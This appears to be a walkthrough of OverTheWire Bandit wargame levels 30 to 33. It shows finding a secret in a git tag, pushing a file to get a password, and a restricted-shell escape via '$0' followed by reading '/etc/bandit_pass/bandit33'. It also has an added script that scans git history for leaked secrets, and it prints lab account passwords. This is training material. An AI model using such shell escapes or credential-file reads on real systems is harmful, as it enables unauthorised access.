bandit30@bandit:/tmp/git-dir30$ ls
repo
bandit30@bandit:/tmp/git-dir30$ cat repo/README.md
just an epmty file... muahaha
bandit30@bandit:/tmp/git-dir30$ cd repo/
bandit30@bandit:/tmp/git-dir30/repo$ git tag
secret
bandit30@bandit:/tmp/git-dir30/repo$ git show secret
fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy
The password obtained for the next-level account bandit31 is: fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy
ssh -p2220 bandit31@bandit.labs.overthewire.org #log in to bandit31
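Levels 28 to 30 all come down to the same point: a secret that is gone from the checked-out files can still be reached through an older commit, another branch or a tag. The script below is an added example, not part of the original write-up or of OverTheWire. It builds a throw-away repository with those three leaks and scans every ref for a marker string; the repository contents, the SAMPLE- values and the function names are constructed for the example.

```bash
#!/bin/sh
# Added example: search history, all branches and tags for a leaked value,
# not only the checked-out files. All repository contents are constructed.

# Build a sample repository mirroring levels 28-30: a secret overwritten by a
# later commit, a secret on branch dev, and a tag pointing directly at a blob.
make_sample_repo() {
    dir=$(mktemp -d) || return 1
    (
        cd "$dir" &&
        export GIT_CONFIG_GLOBAL=/dev/null GIT_CONFIG_NOSYSTEM=1 &&
        git init -q . &&
        git config user.name "Example Author" &&
        git config user.email "author@example.invalid" &&
        main=$(git symbolic-ref --short HEAD) &&
        printf 'password: SAMPLE-history-secret\n' > README.md &&
        git add README.md && git commit -q -m "add missing data" &&
        printf 'password: xxxxxxxxxx\n' > README.md &&
        git commit -q -a -m "fix info leak" &&
        git checkout -q -b dev &&
        printf 'password: SAMPLE-branch-secret\n' > README.md &&
        git commit -q -a -m "add data needed for development" &&
        git checkout -q "$main" &&
        blob=$(printf 'SAMPLE-tag-secret\n' | git hash-object -w --stdin) &&
        git tag secret "$blob"
    ) >/dev/null 2>&1 || return 1
    printf '%s\n' "$dir"
}

# What a reviewer sees when only the current files are searched.
# $1 = repository, $2 = fixed string to look for.
scan_worktree() {
    git -C "$1" grep -F -e "$2" || true
}

# Print one line per hit reachable from any ref. $1 = repository, $2 = fixed string.
scan_all_refs() {
    # 1) Lines added by any commit on any branch or tag.
    git -C "$1" log --all -p --format='commit %h' |
        awk -v pat="$2" '
            /^commit /  { c = $2; next }
            /^\+\+\+ /  { next }                       # diff file header
            /^\+/ && index($0, pat) { print "commit:" c " " substr($0, 2) }'
    # 2) Refs that point straight at a blob, which "git log" never visits.
    git -C "$1" for-each-ref --format='%(objecttype) %(refname:short)' |
    while read -r otype ref; do
        [ "$otype" = blob ] || continue
        git -C "$1" cat-file -p "$ref" | grep -F -e "$2" |
        while IFS= read -r line; do printf 'ref:%s %s\n' "$ref" "$line"; done
    done
    return 0
}

# Demo: the work tree looks clean, the full scan reports three hits.
sample=$(make_sample_repo) && {
    echo "work tree:"; scan_worktree "$sample" "SAMPLE-"
    echo "all refs:";  scan_all_refs "$sample" "SAMPLE-"
    rm -rf "$sample"
}
```

A hit under "all refs" means the value has to be treated as exposed and rotated; a later commit that overwrites it, as in the "fix info leak" commit above, does not take it out of the repository.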
32.level31-level32
goal:There is a git repository at ssh://bandit31-git@localhost/home/bandit31-git/repo via the port 2220. The password for the user bandit31-git is the same as for the user bandit31.Clone the repository and find the password for the next level.
- Approach: the earlier steps are omitted; git clone the repository and look around
- git add -f key.txt
- git commit -m "Add key.txt"
- git push -u origin master
Terminal output:
bandit31@bandit:/tmp/git-dir31$ cat repo/README.md
This time your task is to push a file to the remote repository.
Details:
File name: key.txt
Content: 'May I come in?'
Branch: master
bandit31@bandit:/tmp/git-dir31$ cd repo/
bandit31@bandit:/tmp/git-dir31/repo$ echo 'May I come in?' > key.txt
bandit31@bandit:/tmp/git-dir31/repo$ git add -f key.txt
bandit31@bandit:/tmp/git-dir31/repo$ git commit -m "Add key.txt"
[master 9708629] Add key.txt
1 file changed, 1 insertion(+)
create mode 100644 key.txt
bandit31@bandit:/tmp/git-dir31/repo$ git push -u origin master
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit31/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 2 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 324 bytes | 324.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K #bandit32 password
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost:2220/home/bandit31-git/repo
! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://localhost:2220/home/bandit31-git/repo
The password obtained for the next-level account bandit32 is: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K
ssh -p2220 bandit32@bandit.labs.overthewire.org #log in to bandit32
33.level32-level33
goal:After all this git stuff, it’s time for another escape. Good luck!
- Approach: [entering $0 starts a new shell, because $0 expands to the name of the shell that is running; commands are then typed in that new shell]
Terminal output:
--[ More information ]--
For more information regarding individual wargames, visit
http://www.overthewire.org/wargames/
For support, questions or comments, contact us on discord or IRC.
Enjoy your stay!
WELCOME TO THE UPPERCASE SHELL
>> $0
$ cat /etc/bandit_pass/bandit33
tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0
The password obtained for the next-level account bandit33 is: tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0
ssh -p2220 bandit33@bandit.labs.overthewire.org #log in to bandit33